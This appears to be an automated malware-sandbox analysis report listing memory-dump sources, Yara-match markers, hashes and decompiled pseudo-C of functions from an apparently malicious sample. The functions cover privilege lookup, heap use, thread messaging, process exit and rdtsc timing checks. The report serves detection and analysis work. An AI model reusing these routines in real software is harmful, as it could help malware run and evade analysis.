Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 40fb6229a0cafb38764ab12f8468996382654465e1f5300ab46760f3ef09b16d
Instruction ID: ba906adec83f53e832751c229d7a776c73bbc3e5b375c7cdb28e37230fd5b4dd
Opcode Fuzzy Hash: 40fb6229a0cafb38764ab12f8468996382654465e1f5300ab46760f3ef09b16d
Instruction Fuzzy Hash: 1B900261601200524140716988549074055BBE1255791C121A0988590D8999886566F5

Uniqueness

Uniqueness Score: -1.00%

Function 02999A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02999A5A

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7b1d54e76a1dba98a081c8a4f3a0086efdd2420d2f2d859ec26aca3470d14d86
Instruction ID: 0c6dc0b95738c64541fecc38e8ad2fd708bb909112592440b0c47025f1d3b365
Opcode Fuzzy Hash: 7b1d54e76a1dba98a081c8a4f3a0086efdd2420d2f2d859ec26aca3470d14d86
Instruction Fuzzy Hash: FA900261211A0052D20065694C24B07005597D0347F91C115A0144594CCD55886165B1

Uniqueness

Uniqueness Score: -1.00%

Function 029998F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 029998FA

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e6e74342f983faf456f0c4b97cce3f290739396075ac55336a449704e2784a6
Instruction ID: 32cb546e8321e04c3478c257ad12dabcf141c0d63e0865ddc9281e853cf7e36c
Opcode Fuzzy Hash: 8e6e74342f983faf456f0c4b97cce3f290739396075ac55336a449704e2784a6
Instruction Fuzzy Hash: 8090026160120512D10171594414617005A97D0285FD1C022A1014595ECE658992B1B1

Uniqueness

Uniqueness Score: -1.00%

Function 02999840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0299984A

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f298060753b1d5998c4d4ae0577b1eb62a7638fdbe7233fb673b3c176da0c87a
Instruction ID: b94589e0b7b95fb99b15e4952139e55b3253bc0722c062e051c4898c0cb36c65
Opcode Fuzzy Hash: f298060753b1d5998c4d4ae0577b1eb62a7638fdbe7233fb673b3c176da0c87a
Instruction Fuzzy Hash: D7900261242241625545B15944145074056A7E02857D1C012A1404990C89669856E6B1

Uniqueness

Uniqueness Score: -1.00%

Function 02999860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0299986A

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0df181bbf60d7165e530ae7038b378c1624322ff2b1c444f9d1908c2b07186e8
Instruction ID: 0961198fbf7be227a3bbd59172b011978fa5eac96e0dc4cd67225ed46c426428
Opcode Fuzzy Hash: 0df181bbf60d7165e530ae7038b378c1624322ff2b1c444f9d1908c2b07186e8
Instruction Fuzzy Hash: 8490027120120423D11161594514707005997D0285FD1C412A0414598D9A968952B1B1

Uniqueness

Uniqueness Score: -1.00%

Function 029999A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 029999AA

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 68fffb511b54d3224c69f7cf46d96f47596c9081d2b26ef63dde066661189386
Instruction ID: 22e25bafa3b5d12ff4a395eab9123e1ab60de67df28135d2244922c67c0a8011
Opcode Fuzzy Hash: 68fffb511b54d3224c69f7cf46d96f47596c9081d2b26ef63dde066661189386
Instruction Fuzzy Hash: 4E9002A134120452D10061594424B070055D7E1345F91C015E1054594D8A59CC5271B6

Uniqueness

Uniqueness Score: -1.00%

Function 02999910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0299991A

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 37a671bef5956c2354df97c6248bad2e9b00b7437985a66b580beecaa4b4563c
Instruction ID: ff810349c969a5fef1464e814acdafc32dfec9d17c365b0e784fa968e1872f7b
Opcode Fuzzy Hash: 37a671bef5956c2354df97c6248bad2e9b00b7437985a66b580beecaa4b4563c
Instruction Fuzzy Hash: 319002B120120412D14071594414747005597D0345F91C011A5054594E8A998DD576F5

Uniqueness

Uniqueness Score: -1.00%

Function 029996E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 029996EA

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cf24e4969f6688dd8ba5e1ead536a0e328b37e58c3054f624063af85d228ff52
Instruction ID: 9d64a8fed4af7d431b02f0413c1e64b69dcea0984f5cc38e0a0613cbab10642d
Opcode Fuzzy Hash: cf24e4969f6688dd8ba5e1ead536a0e328b37e58c3054f624063af85d228ff52
Instruction Fuzzy Hash: 3F90027120128812D1106159841474B005597D0345F95C411A4414698D8AD5889171B1

Uniqueness

Uniqueness Score: -1.00%

Function 02999660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0299966A

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 25d0bf06704e8b68ada3ed8c238164aa0e9cff5a153d1a2e3cbd5b3d11dcdf79
Instruction ID: 0fb87e8f4c1f427d7c81db78c968b3fcedc805e6a1a12007166ae6280102d86b
Opcode Fuzzy Hash: 25d0bf06704e8b68ada3ed8c238164aa0e9cff5a153d1a2e3cbd5b3d11dcdf79
Instruction Fuzzy Hash: 4490027120120812D1807159441464B005597D1345FD1C015A0015694DCE558A5977F1

Uniqueness

Uniqueness Score: -1.00%

Function 02999780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0299978A

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c4e68787aeac1915aeed539cdef64f71fdc47d4b5f99d4a2a0c3a97fadb6132e
Instruction ID: 6b5f07a6ace8e974becada492a3e98398adf8145d0f1803ae95fcad7c9e22adc
Opcode Fuzzy Hash: c4e68787aeac1915aeed539cdef64f71fdc47d4b5f99d4a2a0c3a97fadb6132e
Instruction Fuzzy Hash: 9B90026921320012D1807159541860B005597D1246FD1D415A0005598CCD55886963B1

Uniqueness

Uniqueness Score: -1.00%

Function 029997A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 029997AA

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9279b78b40b79e0d2a8955eb8864cc873863e666823fe149dc3885b60d1d0a52
Instruction ID: db3069d61b263166919cb6f73e746fcd60bb24e8a7ee9e6a3e23954983797cdd
Opcode Fuzzy Hash: 9279b78b40b79e0d2a8955eb8864cc873863e666823fe149dc3885b60d1d0a52
Instruction Fuzzy Hash: 2190026130120013D140715954286074055E7E1345F91D011E0404594CDD55885662B2

Uniqueness

Uniqueness Score: -1.00%

Function 02999710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0299971A

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 45ef79af81b9d49e2eaaf6b4e44f8977b08ef5f8ebe57dc3d30484001ddb7abe
Instruction ID: 896edb92c9eb5924bb9700701fef446dd5ec4d11c7099ffb679ef5666f832897
Opcode Fuzzy Hash: 45ef79af81b9d49e2eaaf6b4e44f8977b08ef5f8ebe57dc3d30484001ddb7abe
Instruction Fuzzy Hash: 4390027120120412D10065995418647005597E0345F91D011A5014595ECAA5889171B1

Uniqueness

Uniqueness Score: -1.00%

Function 029995D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 029995DA

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d62ce9511b421c3130a9cbfbd6e3a30fc28bfe0645a43a3669c5b5e1770450df
Instruction ID: a81f978ba33b9f93acda4aea6e6d77945dc0ec7143421093ff296626642c0349
Opcode Fuzzy Hash: d62ce9511b421c3130a9cbfbd6e3a30fc28bfe0645a43a3669c5b5e1770450df
Instruction Fuzzy Hash: 9E9002A120220013410571594424617405A97E0245B91C021E10045D0DC965889171B5

Uniqueness

Uniqueness Score: -1.00%

Function 02999540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0299954A

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7dda9f56190c7db0dae786ebc0dcd83fdadc662b8b87e48245f79e614933d8d9
Instruction ID: 1920607fe2988d9b2c25df39d99be3a994f214e1e096d941a0c657166d26140e
Opcode Fuzzy Hash: 7dda9f56190c7db0dae786ebc0dcd83fdadc662b8b87e48245f79e614933d8d9
Instruction Fuzzy Hash: 73900265211200130105A5590714507009697D5395391C021F1005590CDA61886161B1

Uniqueness

Uniqueness Score: -1.00%

Function 00019A80, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00019A80(void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00017E80(__edi, _t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00018090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					_push(__edi);
					do {
						E0002B800( &_v284, 0x104);
						E0002BE70( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00024DB0(E00024D50(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E000180C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00018140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00019a8b
0x00019a93
0x00019a95
0x00019a9a
0x00019a9f
0x00019ab2
0x00019ab7
0x00019aba
0x00019ac0
0x00019acc
0x00019adf
0x00019ae4
0x00019ae7
0x00019af0
0x00019b02
0x00019b07
0x00019b0c
0x00000000
0x00000000
0x00019b0e
0x00019b12
0x00000000
0x00000000
0x00019b14
0x00000000
0x00019b12
0x00019b16
0x00019b19
0x00019b1f
0x00019b21
0x00019b2c
0x00019b31
0x00019b34
0x00019b41
0x00019b4c
0x00019b4e
0x00019b54
0x00019b58
0x00019b5b
0x00019b5b
0x00019b62
0x00019b65
0x00019b6a
0x00019b77
0x00019aa6
0x00019aa6
0x00019aa6

Memory Dump Source

Source File: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000002.00000002.357982830.0000000000010000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
Instruction ID: 1b613636ac68fc758388f14d1552569f1a810c31a11b976b15b7beff4325911f
Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
Instruction Fuzzy Hash: C4213772D4421857CB21D660AD92BEF73FCAF55304F4400ADE94993002F734AB88CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 000182E8, Relevance: 1.6, APIs: 1, Instructions: 57
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E000182E8(void* __ecx, signed int __edx, void* __esi, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				intOrPtr _v117;
				int _t16;
				long _t26;
				void* _t29;
				int _t32;
				void* _t35;
				void* _t37;
				signed char _t42;

				_t29 = __esi + 1;
				_t42 = __edx |  *(__ecx + 0x6e93a1b2);
				_v117();
				_t35 = _t37;
				_push(_t29);
				_v68 = 0;
				E0002B850( &_v67, 0, 0x3f);
				E0002C3F0( &_v68, 3);
				_t16 = E00024E10(_a4 + 0x1c, E0001ACC0(_t42, _a4 + 0x1c,  &_v68), 0, 0, 0xc4e7b6d6);
				_t32 = _t16;
				if(_t32 != 0) {
					_t26 = _a8;
					_t16 = PostThreadMessageW(_t26, 0x111, 0, 0); // executed
					_t44 = _t16;
					if(_t16 == 0) {
						_t16 =  *_t32(_t26, 0x8003, _t35 + (E0001A450(_t44, 1, 8) & 0x000000ff) - 0x40, _t16);
					}
				}
				return _t16;
			}

0x000182e8
0x000182e9
0x000182ef
0x000182f1
0x000182f6
0x000182ff
0x00018303
0x0001830e
0x0001832e
0x00018333
0x0001833a
0x0001833d
0x0001834a
0x0001834c
0x0001834e
0x0001836b
0x0001836b
0x0001836d
0x00018372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0001834A

Memory Dump Source

Source File: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000002.00000002.357982830.0000000000010000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 9c827efc4e489f08d02bd51413e26a56f017372e25ac39961bc9ad7bb6c187bf
Instruction ID: d358379612d1a6aa70f21054456f8a19365664e297a967d959af35c1fdbb329e
Opcode Fuzzy Hash: 9c827efc4e489f08d02bd51413e26a56f017372e25ac39961bc9ad7bb6c187bf
Instruction Fuzzy Hash: B901F031A402247BEB20A6949C43FFE7B6C6F41B51F154518FF08BA1C3D6D56A0547F1

Uniqueness

Uniqueness Score: -1.00%

Function 000182F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E000182F0(intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_v68 = 0;
				E0002B850( &_v67, 0, 0x3f);
				E0002C3F0( &_v68, 3);
				_t13 = E00024E10(_a4 + 0x1c, E0001ACC0(_t30, _a4 + 0x1c,  &_v68), 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0001A450(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x000182ff
0x00018303
0x0001830e
0x0001832e
0x00018333
0x0001833a
0x0001833d
0x0001834a
0x0001834c
0x0001834e
0x0001836b
0x0001836b
0x00000000
0x0001836d
0x00018372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0001834A

Memory Dump Source

Source File: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000002.00000002.357982830.0000000000010000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b9b79d427e30a74c20ea09e4d7148b624c3393b461da0744b498f80ec6a4bdbd
Instruction ID: 639c8c5301001d36f13282b7a6579435f86357270c07dbce6e007ce7c18071ad
Opcode Fuzzy Hash: b9b79d427e30a74c20ea09e4d7148b624c3393b461da0744b498f80ec6a4bdbd
Instruction Fuzzy Hash: 0301A731A802287BE720A6949C03FFE776C6B41F50F154118FF08BA1C2EAA46A0547F6

Uniqueness

Uniqueness Score: -1.00%

Function 0002A052, Relevance: 1.5, APIs: 1, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0002A052(void* __eax, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
				void* _v1378624087;
				char _t13;
				void* _t20;

				asm("lahf");
				asm("stosb");
				_t10 = _a8;
				_t4 = _t10 + 0xc74; // 0xc74
				E0002A950(_t20, _a8, _t4,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
				_t13 = RtlFreeHeap(_a12, _a16, _a20); // executed
				return _t13;
			}

0x0002a058
0x0002a05b
0x0002a063
0x0002a06f
0x0002a077
0x0002a08d
0x0002a091

APIs

RtlFreeHeap.NTDLL(00000060,00019CC3,?,?,00019CC3,00000060,00000000,00000000,?,?,00019CC3,?,00000000), ref: 0002A08D

Memory Dump Source

Source File: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000002.00000002.357982830.0000000000010000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2abdb13f8eff3bb4bf11ea18569b756c8eed86f89cea3fed5c272735f270b6b8
Instruction ID: 1471d452ee823273d99910887d4d7fa1a714627fefbf3ce4cca900477f7e2669
Opcode Fuzzy Hash: 2abdb13f8eff3bb4bf11ea18569b756c8eed86f89cea3fed5c272735f270b6b8
Instruction Fuzzy Hash: EDE06DB16102046BD718DF99DC85EE7776CAF88710F018659FA486B241CA30ED01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0002A020, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0002A020(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0002A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0002a037
0x0002a04d
0x0002a051

APIs

RtlAllocateHeap.NTDLL(000244F6,?,00024C6F,00024C6F,?,000244F6,?,?,?,?,?,00000000,00019CC3,?), ref: 0002A04D

Memory Dump Source

Source File: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000002.00000002.357982830.0000000000010000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 825c8d1ca12d65375854821b39221df8c1b1fbb6c0edef6474c6931740c27bcb
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 95E012B1200218ABDB14EF99DC41EA777ACAF88650F118558BA185B242CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0002A060, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0002A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0002A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0002a06f
0x0002a077
0x0002a08d
0x0002a091

APIs

RtlFreeHeap.NTDLL(00000060,00019CC3,?,?,00019CC3,00000060,00000000,00000000,?,?,00019CC3,?,00000000), ref: 0002A08D

Memory Dump Source

Source File: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000002.00000002.357982830.0000000000010000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: e86ae5d35ad637b6e2b3209c3c158decf71a2df41299dc3b821bdb06562f65ae
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 97E012B1200218ABDB18EF99DC49EA777ACAF88750F018558BA185B242CA30E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0002A092, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0002A092(intOrPtr _a12, int _a16) {
				void* _v1;
				intOrPtr* _t8;
				void* _t13;

				asm("adc eax, 0x9165c83");
				asm("std");
				 *_t8 =  *_t8 - _t13;
				_pop(_t17);
				asm("sbb al, 0x55");
				_t5 = _a12;
				E0002A950(_t13, _a12, _a12 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a16);
			}

0x0002a093
0x0002a098
0x0002a099
0x0002a09d
0x0002a09f
0x0002a0a3
0x0002a0ba
0x0002a0c8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0002A0C8

Memory Dump Source

Source File: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000002.00000002.357982830.0000000000010000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 394822f991a95f2faeb01b7020a1c20dd70e61f6a0b0af2229750dc1ccd428d5
Instruction ID: 4376123de782bba62281a25627c83f04b4e39eb0893fc594eb54f7f8b0748816
Opcode Fuzzy Hash: 394822f991a95f2faeb01b7020a1c20dd70e61f6a0b0af2229750dc1ccd428d5
Instruction Fuzzy Hash: BCE086727002146BCB219F74CC85FD73BA8DF49750F058165BA695B241C930E605C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 0002A1C0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0002A1C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0002A950(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0002a1da
0x0002a1f0
0x0002a1f4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0001F192,0001F192,0000003C,00000000,?,00019D35), ref: 0002A1F0

Memory Dump Source

Source File: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000002.00000002.357982830.0000000000010000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 2a6c00603e1b13a3583a6375e9e7f7d96c7394d467fb360e085486236ca92eba
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: C4E01AB16002186BDB10DF49DC85EE737ADAF89650F018154BA0C57242C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0002A0A0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0002A0A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0002A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0002a0a3
0x0002a0ba
0x0002a0c8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0002A0C8

Memory Dump Source

Source File: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000002.00000002.357982830.0000000000010000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: f38422580fe6830b147641c706eb4b50d72125ca91cd3126755a0a4514a21509
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: C6D017726002187BD620EB99DC86FD777ACDF497A0F0180A5BA5C6B242C931BA008AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0299967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02999694

